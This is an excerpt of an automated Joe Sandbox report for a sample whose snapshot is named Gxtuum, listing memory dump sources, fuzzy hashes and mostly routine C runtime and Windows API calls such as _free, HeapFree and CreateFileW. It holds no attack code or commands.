                                                                • Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast
                                                                • String ID:
                                                                • API String ID: 776569668-0
                                                                • Opcode ID: e08aa99135b6fb84b1668f85e0a9951654680505a9d7ca4628ded357de989079
                                                                • Instruction ID: c9a677b6b32e57fb6ca895d49b0925a98bdad327ba0f747b9ec81e293c951066
                                                                • Opcode Fuzzy Hash: e08aa99135b6fb84b1668f85e0a9951654680505a9d7ca4628ded357de989079
                                                                • Instruction Fuzzy Hash: 0A213E72504710ABC675EB68FCC6C5BB3EAEBA93107654E18F045E7A62CB74FCD08624
                                                                APIs
                                                                • _free.LIBCMT ref: 00121B36
                                                                  • Part of subcall function 001185A6: HeapFree.KERNEL32(00000000,00000000,?,0012154C,?,00000000,?,?,?,001217EF,?,00000007,?,?,00121C94,?), ref: 001185BC
                                                                  • Part of subcall function 001185A6: GetLastError.KERNEL32(?,?,0012154C,?,00000000,?,?,?,001217EF,?,00000007,?,?,00121C94,?,?), ref: 001185CE
                                                                  • Part of subcall function 00120DF7: _free.LIBCMT ref: 00120E14
                                                                  • Part of subcall function 00120DF7: _free.LIBCMT ref: 00120E26
                                                                  • Part of subcall function 00120DF7: _free.LIBCMT ref: 00120E38
                                                                  • Part of subcall function 00120DF7: _free.LIBCMT ref: 00120E4A
                                                                  • Part of subcall function 00120DF7: _free.LIBCMT ref: 00120E5C
                                                                  • Part of subcall function 00120DF7: _free.LIBCMT ref: 00120E6E
                                                                  • Part of subcall function 00120DF7: _free.LIBCMT ref: 00120E80
                                                                  • Part of subcall function 00120DF7: _free.LIBCMT ref: 00120E92
                                                                  • Part of subcall function 00120DF7: _free.LIBCMT ref: 00120EA4
                                                                  • Part of subcall function 00120DF7: _free.LIBCMT ref: 00120EB6
                                                                  • Part of subcall function 00120DF7: _free.LIBCMT ref: 00120EC8
                                                                  • Part of subcall function 00120DF7: _free.LIBCMT ref: 00120EDA
                                                                  • Part of subcall function 00120DF7: _free.LIBCMT ref: 00120EEC
                                                                • _free.LIBCMT ref: 00121B58
                                                                • _free.LIBCMT ref: 00121B6D
                                                                • _free.LIBCMT ref: 00121B78
                                                                • _free.LIBCMT ref: 00121B9A
                                                                • _free.LIBCMT ref: 00121BAD
                                                                • _free.LIBCMT ref: 00121BBB
                                                                • _free.LIBCMT ref: 00121BC6
                                                                • _free.LIBCMT ref: 00121BFE
                                                                • _free.LIBCMT ref: 00121C05
                                                                • _free.LIBCMT ref: 00121C22
                                                                • _free.LIBCMT ref: 00121C3A
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast
                                                                • String ID:
                                                                • API String ID: 776569668-0
                                                                • Opcode ID: 5a509833fa1ef15ffd8d728433710aa4e6a80ed066b917ec20dec6aeaf661e6e
                                                                • Instruction ID: 41af9672aae356a2cfb073c7078c1b5b747fc7a6acefbacbe4211ace791769d6
                                                                • Opcode Fuzzy Hash: 5a509833fa1ef15ffd8d728433710aa4e6a80ed066b917ec20dec6aeaf661e6e
                                                                • Instruction Fuzzy Hash: 85314C32600311AFEB35EA78EC45F96B7FAEF60350F148829E059E7151EF70E9A08724
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID: 0-3907804496
                                                                • Opcode ID: 711500e1e4da2e3ebb50c4a34c42fcabab12c17435a4b311a5e6ee811acfaa0b
                                                                • Instruction ID: 0b8ae7d2805acd4d8c5e7f9c80e5f8f35df12507d3c9a783d4a4edb020361d86
                                                                • Opcode Fuzzy Hash: 711500e1e4da2e3ebb50c4a34c42fcabab12c17435a4b311a5e6ee811acfaa0b
                                                                • Instruction Fuzzy Hash: 02C1D170A0C245AFDB19DFA8C8C1BEEBBB0BF59310F144069F5459B2A2CB7199C1CB61
                                                                APIs
                                                                  • Part of subcall function 00123B48: CreateFileW.KERNEL32(00000000,00000000,?,00123F38,?,?,00000000,?,00123F38,00000000,0000000C), ref: 00123B65
                                                                • GetLastError.KERNEL32 ref: 00123FA3
                                                                • __dosmaperr.LIBCMT ref: 00123FAA
                                                                • GetFileType.KERNEL32(00000000), ref: 00123FB6
                                                                • GetLastError.KERNEL32 ref: 00123FC0
                                                                • __dosmaperr.LIBCMT ref: 00123FC9
                                                                • CloseHandle.KERNEL32(00000000), ref: 00123FE9
                                                                • CloseHandle.KERNEL32(001177E1), ref: 00124136
                                                                • GetLastError.KERNEL32 ref: 00124168
                                                                • __dosmaperr.LIBCMT ref: 0012416F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                • String ID: H
                                                                • API String ID: 4237864984-2852464175
                                                                • Opcode ID: 4cabe1102f51c705b275218e20c4242fde6070e8d6b69c1a9f7bbe808ed43b03
                                                                • Instruction ID: 0f51b71f29007d5abd0954c1de1e64083b4601f2b3da468afe763477bc35d004
                                                                • Opcode Fuzzy Hash: 4cabe1102f51c705b275218e20c4242fde6070e8d6b69c1a9f7bbe808ed43b03
                                                                • Instruction Fuzzy Hash: 3DA15632A001649FCF1D9F68EC517EE7BA1AF16320F180159F815EF2A1CB359DA6CB52
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: _free
                                                                • String ID:
                                                                • API String ID: 269201875-0
                                                                • Opcode ID: bdec59f59a08f04f732bcf6251f79bf9c09292db50031cc814f583b315c4deb3
                                                                • Instruction ID: 55d3c87de21f2f8ea26c17e8f8e431f15491539c8e4512faa531a8b4f69fdf75
                                                                • Opcode Fuzzy Hash: bdec59f59a08f04f732bcf6251f79bf9c09292db50031cc814f583b315c4deb3
                                                                • Instruction Fuzzy Hash: ADC18772E40214BFDB64DBA8CC82FEE77F99B19710F544065FA04FB282D770A98097A4
                                                                APIs
                                                                • IsInExceptionSpec.LIBVCRUNTIME ref: 0010D20F
                                                                • type_info::operator==.LIBVCRUNTIME ref: 0010D231
                                                                • ___TypeMatch.LIBVCRUNTIME ref: 0010D340
                                                                • IsInExceptionSpec.LIBVCRUNTIME ref: 0010D412
                                                                • _UnwindNestedFrames.LIBCMT ref: 0010D496
                                                                • CallUnexpected.LIBVCRUNTIME ref: 0010D4B1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                • String ID: csm$csm$csm
                                                                • API String ID: 2123188842-393685449
                                                                • Opcode ID: 3b200bf2838968325385b8402db82a5cf1b1e4673d1ae0c21e9b54624fc14529
                                                                • Instruction ID: 58cc018d26f082863fe0b905d2c9232b69031924c6fe9a4b4604562c711a6c4b
                                                                • Opcode Fuzzy Hash: 3b200bf2838968325385b8402db82a5cf1b1e4673d1ae0c21e9b54624fc14529
                                                                • Instruction Fuzzy Hash: 9EB19D71800209EFCF18DFE4E8819AEBBB5FF14310B144169F895AB696D7B0EA51CF91
                                                                APIs
                                                                • _free.LIBCMT ref: 001170BE
                                                                  • Part of subcall function 001185A6: HeapFree.KERNEL32(00000000,00000000,?,0012154C,?,00000000,?,?,?,001217EF,?,00000007,?,?,00121C94,?), ref: 001185BC
                                                                  • Part of subcall function 001185A6: GetLastError.KERNEL32(?,?,0012154C,?,00000000,?,?,?,001217EF,?,00000007,?,?,00121C94,?,?), ref: 001185CE
                                                                • _free.LIBCMT ref: 001170CA
                                                                • _free.LIBCMT ref: 001170D5
                                                                • _free.LIBCMT ref: 001170E0
                                                                • _free.LIBCMT ref: 001170EB
                                                                • _free.LIBCMT ref: 001170F6
                                                                • _free.LIBCMT ref: 00117101
                                                                • _free.LIBCMT ref: 0011710C
                                                                • _free.LIBCMT ref: 00117117
                                                                • _free.LIBCMT ref: 00117125
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast
                                                                • String ID:
                                                                • API String ID: 776569668-0
                                                                • Opcode ID: a6628158ddeb24f4a34ba61f7e9cedf93a88564bc8ffd72b5d8fefbc041f917a
                                                                • Instruction ID: 7becc53ad281a994ba193c646e54b98d8ff7a8689fce5e7bef6e9aeeb4a69bb4
                                                                • Opcode Fuzzy Hash: a6628158ddeb24f4a34ba61f7e9cedf93a88564bc8ffd72b5d8fefbc041f917a
                                                                • Instruction Fuzzy Hash: DC219A76910208AFCB45EF94CD81DDEBBB9FF98340F0181A5F515AB121EB31EA84CB90
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: _free
                                                                • String ID:
                                                                • API String ID: 269201875-0
                                                                • Opcode ID: 09ebec626ab53d40dc64ef3ed5336fd067fc453f1db750c4afa9e4a95943e1b9
                                                                • Instruction ID: 2571bb16390ccdc858a6142a25f53e43171d3637e9f892ffdb9a42ae2a3235f1
                                                                • Opcode Fuzzy Hash: 09ebec626ab53d40dc64ef3ed5336fd067fc453f1db750c4afa9e4a95943e1b9
                                                                • Instruction Fuzzy Hash: DE610671900355BFDB24EF64D841FAAB7F9FF65720F104529E849EB281EB70AD808B50
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: CurrentThread$_xtime_get$Xtime_diff_to_millis2
                                                                • String ID:
                                                                • API String ID: 3943753294-0
                                                                • Opcode ID: 897eb11877fd43a912f490587694e36c4f9e490a2598b8a09484984ad79e4b6c
                                                                • Instruction ID: 92da8a4f611b4c4ecaa8525b3e54c566a885e3823ee3bd729b81c90f3326f945
                                                                • Opcode Fuzzy Hash: 897eb11877fd43a912f490587694e36c4f9e490a2598b8a09484984ad79e4b6c
                                                                • Instruction Fuzzy Hash: C3517C75A00206EFCF10DF64C9A55A9B7F4FF09320B25855AE886AB6D6C7B0ED80CB50
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: Mtx_unlock$Rethrow_future_exceptionstd::_$Cnd_broadcast
                                                                • String ID:
                                                                • API String ID: 3990724213-0
                                                                • Opcode ID: d277154daf88329b674f290a4d6c86f798ab51c1ad914dbaaf3a8fc0bc1f5655
                                                                • Instruction ID: 15195f0fa839e57e282ec7001ead58c21d86a89d1d07c54088959a2f769d770c
                                                                • Opcode Fuzzy Hash: d277154daf88329b674f290a4d6c86f798ab51c1ad914dbaaf3a8fc0bc1f5655
                                                                • Instruction Fuzzy Hash: 50B102B1D006099FDB24DF74C949BAEBBB4FF15300F00452EE896A76D2DBB1A944CB91
                                                                APIs
                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 00109C0F
                                                                • __alloca_probe_16.LIBCMT ref: 00109C3B
                                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00109C7A
                                                                • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00109C97
                                                                • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00109CD6
                                                                • __alloca_probe_16.LIBCMT ref: 00109CF3
                                                                • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00109D35
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00109D58
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                • String ID:
                                                                • API String ID: 2040435927-0
                                                                • Opcode ID: c831b13493e5f05db061a76ba83af6a9856d24743362f0fdefc1ce4d45533068
                                                                • Instruction ID: 670b2ea869d78fd9cae5cfe459dcde6eeaf1aaccf7e4917ae34e69433a2570eb
                                                                • Opcode Fuzzy Hash: c831b13493e5f05db061a76ba83af6a9856d24743362f0fdefc1ce4d45533068
                                                                • Instruction Fuzzy Hash: 3751AC7294020ABBEF208FA1DC55FAF7BA9EF44750F254129F951D61A2E7B1CD10CBA0
                                                                APIs
                                                                  • Part of subcall function 001171C0: GetLastError.KERNEL32(?,?,?,0010E627,?,?,?,?,0010F4C2,?), ref: 001171C5
                                                                  • Part of subcall function 001171C0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,0010E627,?,?,?,?,0010F4C2,?), ref: 00117263
                                                                • _free.LIBCMT ref: 0011604B
                                                                • _free.LIBCMT ref: 00116064
                                                                • _free.LIBCMT ref: 001160A2
                                                                • _free.LIBCMT ref: 001160AB
                                                                • _free.LIBCMT ref: 001160B7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: _free$ErrorLast
                                                                • String ID: C
                                                                • API String ID: 3291180501-1037565863
                                                                • Opcode ID: b23dde285395668fe7ff410fcdff245196b0b0e3beeb68d9de2f4aec8b464dd9
                                                                • Instruction ID: 51946bf4af9f1fdb60f0cc10d0708ed8e111091c67501ba572bd8d30fad8d74e
                                                                • Opcode Fuzzy Hash: b23dde285395668fe7ff410fcdff245196b0b0e3beeb68d9de2f4aec8b464dd9
                                                                • Instruction Fuzzy Hash: 00B1397590161ADFDB28DF18C884AEDB3B5FF58304F5085AAE849A7290E771AED0CF40
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: list too long
                                                                • API String ID: 0-1124181908
                                                                • Opcode ID: 4dcc8370309c6bd5bd2bc5877a69160d46b2518ce4cdb579ae6c87c14f760cfb
                                                                • Instruction ID: 62348883b0880ef16c30ee82e33ed9b416931b5443cfcccb52564900bb9cfeb2
                                                                • Opcode Fuzzy Hash: 4dcc8370309c6bd5bd2bc5877a69160d46b2518ce4cdb579ae6c87c14f760cfb
                                                                • Instruction Fuzzy Hash: 1151B1B4D047189BDB10DF64DD85B9AF7F4FF14310F0042A9E948AB691DB70AA81CF51
                                                                APIs
                                                                • _ValidateLocalCookies.LIBCMT ref: 0010CC17
                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 0010CC1F
                                                                • _ValidateLocalCookies.LIBCMT ref: 0010CCA8
                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 0010CCD3
                                                                • _ValidateLocalCookies.LIBCMT ref: 0010CD28
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                • String ID: csm
                                                                • API String ID: 1170836740-1018135373
                                                                • Opcode ID: 584c73fdcdb05d76815fabc3bd9f3bcdb154938fbbdf0d0bdc6cf9e40b59f1de
                                                                • Instruction ID: b8730794b83aed571cc29ed6be402cfceb68a295a8ed8995bef0c73447758634
                                                                • Opcode Fuzzy Hash: 584c73fdcdb05d76815fabc3bd9f3bcdb154938fbbdf0d0bdc6cf9e40b59f1de
                                                                • Instruction Fuzzy Hash: 7941E434A002199BCF00EFA8C881A9EBBB5FF45324F148255E859AB3D2D7B1DA05CFD1
                                                                APIs
                                                                  • Part of subcall function 00121522: _free.LIBCMT ref: 00121547
                                                                • _free.LIBCMT ref: 00121824
                                                                  • Part of subcall function 001185A6: HeapFree.KERNEL32(00000000,00000000,?,0012154C,?,00000000,?,?,?,001217EF,?,00000007,?,?,00121C94,?), ref: 001185BC
                                                                  • Part of subcall function 001185A6: GetLastError.KERNEL32(?,?,0012154C,?,00000000,?,?,?,001217EF,?,00000007,?,?,00121C94,?,?), ref: 001185CE
                                                                • _free.LIBCMT ref: 0012182F
                                                                • _free.LIBCMT ref: 0012183A
                                                                • _free.LIBCMT ref: 0012188E
                                                                • _free.LIBCMT ref: 00121899
                                                                • _free.LIBCMT ref: 001218A4
                                                                • _free.LIBCMT ref: 001218AF
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast
                                                                • String ID:
                                                                • API String ID: 776569668-0
                                                                • Opcode ID: 8e077332dbe01b7341d50a84b951b88c6f42d95a84fc469bf2f7f0e4c6a3109e
                                                                • Instruction ID: af356fa42009798e60cc4f6803258244cbb6eabeeb505adb44c4226e39960f38
                                                                • Opcode Fuzzy Hash: 8e077332dbe01b7341d50a84b951b88c6f42d95a84fc469bf2f7f0e4c6a3109e
                                                                • Instruction Fuzzy Hash: 79117F32941B14BAD530FBB0DC47FCBB7DDAFA5700F804C24B29BA6052DB24F6554650
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: cd9a29fe7c454f9e59b1c79defdb67cb8f1ace3124f6204779d4e3c708724210
                                                                • Instruction ID: e11fc1f474df2db8064ab44b08900854c3757fa641b0087c59f34fdb22cf642e
                                                                • Opcode Fuzzy Hash: cd9a29fe7c454f9e59b1c79defdb67cb8f1ace3124f6204779d4e3c708724210
                                                                • Instruction Fuzzy Hash: 24E18971A0024C9BEF18DF68CD4ABBDBB72AF40300F64811CF545A76C2CBB59A84CB91
                                                                APIs
                                                                • GetConsoleOutputCP.KERNEL32(?,00000000,?), ref: 00117BA7
                                                                • __fassign.LIBCMT ref: 00117D8C
                                                                • __fassign.LIBCMT ref: 00117DA9
                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00117DF1
                                                                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00117E31
                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00117ED9
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                                                • String ID:
                                                                • API String ID: 1735259414-0
                                                                • Opcode ID: 1d582132f2e86abb71c9d0c19b36fc5fa9f388bb8b378f3599fe7f5c4fb8603f
                                                                • Instruction ID: f325c1b52732f2ade0ea2b56702e023a8ef2b94442e3b24a2b3cfda6e691a660
                                                                • Opcode Fuzzy Hash: 1d582132f2e86abb71c9d0c19b36fc5fa9f388bb8b378f3599fe7f5c4fb8603f
                                                                • Instruction Fuzzy Hash: A6C18D75D092589FCB18CFE8D8809EDBBF5AF59304F2841AAE855B7381D7319D82CB60
                                                                APIs
                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00104BA5
                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00104BC7
                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00104BE7
